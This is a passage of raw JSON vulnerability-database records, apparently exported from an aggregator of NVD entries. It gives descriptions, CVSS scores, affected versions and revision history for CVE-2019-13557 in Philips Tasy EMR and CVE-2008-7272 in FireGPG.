Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-12-09T21:41:42", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["SMNTC-110814"], "type": "symantec"}], "rev": 2}, "score": {"modified": "2020-12-09T21:41:42", "rev": 2, "value": 5.4, "vector": "NONE"}}, "extraReferences": [], "hash": "ee8bd8ea7f57b4c521e32a7ba2867150a40d44f43277a8bf049f3aecf8dac07f", "hashmap": [{"hash": "66dda15d8673f8acf302e6abfdf034d4", "key": "cpe23"}, {"hash": "92d7b7dc5aefded413327c1cf5b692bd", "key": "description"}, {"hash": "d2d2311a75d334a58c48c6f0828d824b", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "3d1c4479f1355507da16d604579a9591", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "030e100bd87da58d86c9425ee8183685", "key": "published"}, {"hash": "002ab1d792c007a7cf57e1a80bff013c", "key": "modified"}, {"hash": "c91004c8959347662f0169e9eb71bd9b", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "92b6a5f115c1fa43fece7b1c4c9e2c47", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "835f2efa961cf20b2bead9ce60fb6578", "key": "cvss3"}, {"hash": "8e0774a8b9ab0e5c52c18147d022a770", "key": "affectedSoftware"}, {"hash": "2b3cb3dc8cdb9c6653711c31934fc310", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "id": "CVE-2019-13557", "lastseen": "2020-12-09T21:41:42", "modified": "2019-11-13T19:35:00", "objectVersion": "1.3", "published": "2019-11-08T18:15:00", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "reporter": "cve@mitre.org", "title": "CVE-2019-13557", "type": "cve", "viewCount": 27}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-12-09T21:41:42"}, {"bulletin": {"affectedSoftware": [{"name": "philips tasy_emr", "operator": "le", "version": "3.02.1744"}, {"name": "philips tasy_webportal", "operator": "le", "version": "3.02.1757"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "In Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T20:02:02", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["SMNTC-110814"], "type": "symantec"}], "rev": 2}, "score": {"modified": "2019-11-15T20:02:02", "rev": 2, "value": 5.4, "vector": "NONE"}}, "hash": "56c0d14452b042b2e675e9396fe04f5c9312784cff4293b3597d8ad5fe729e03", "hashmap": [{"hash": "92d7b7dc5aefded413327c1cf5b692bd", "key": "description"}, {"hash": "80c1f301853bd9b19d9269bc982b6b79", "key": "affectedSoftware"}, {"hash": "d2d2311a75d334a58c48c6f0828d824b", "key": "href"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "030e100bd87da58d86c9425ee8183685", "key": "published"}, {"hash": "002ab1d792c007a7cf57e1a80bff013c", "key": "modified"}, {"hash": "c91004c8959347662f0169e9eb71bd9b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "2b3cb3dc8cdb9c6653711c31934fc310", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "id": "CVE-2019-13557", "lastseen": "2019-11-15T20:02:02", "modified": "2019-11-13T19:35:00", "objectVersion": "1.3", "published": "2019-11-08T18:15:00", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "reporter": "cve@mitre.org", "title": "CVE-2019-13557", "type": "cve", "viewCount": 26}, "differentElements": ["cpe23", "cvss3", "cpe", "affectedSoftware"], "edition": 2, "lastseen": "2019-11-15T20:02:02"}], "edition": 8, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "8e0774a8b9ab0e5c52c18147d022a770"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "92b6a5f115c1fa43fece7b1c4c9e2c47"}, {"key": "cpe23", "hash": "66dda15d8673f8acf302e6abfdf034d4"}, {"key": "cpeConfiguration", "hash": "89b60f54083400643fd69c1608234afc"}, {"key": "cvelist", "hash": "5062ea5024d79bc24dc105d924d2b405"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "835f2efa961cf20b2bead9ce60fb6578"}, {"key": "cwe", "hash": "b647a850fd42b235dd11ee60cf626f2d"}, {"key": "description", "hash": "92d7b7dc5aefded413327c1cf5b692bd"}, {"key": "extraReferences", "hash": "ddfb7c1fc3f82e6caa17353ace986f88"}, {"key": "href", "hash": "d2d2311a75d334a58c48c6f0828d824b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "002ab1d792c007a7cf57e1a80bff013c"}, {"key": "published", "hash": "030e100bd87da58d86c9425ee8183685"}, {"key": "references", "hash": "2b3cb3dc8cdb9c6653711c31934fc310"}, {"key": "reporter", "hash": "345c97c4bc16e15b8caea3259064e12a"}, {"key": "title", "hash": "c91004c8959347662f0169e9eb71bd9b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "166ee9038c116a7f2e746476f9cbdf17ff4894bf6fec57a90b234efa176245b6", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-110814"]}, {"type": "ics", "idList": ["ICSMA-19-120-01"]}], "modified": "2021-04-23T00:45:11", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-04-23T00:45:11", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:philips:tasy_emr:3.02.1744", "cpe:/a:philips:tasy_webportal:3.02.1757"], "affectedSoftware": [{"cpeName": "philips:tasy_webportal", "name": "philips tasy webportal", "operator": "le", "version": "3.02.1757"}, {"cpeName": "philips:tasy_emr", "name": "philips tasy emr", "operator": "le", "version": "3.02.1744"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "cpe23": ["cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.02.1744", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.02.1757", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": 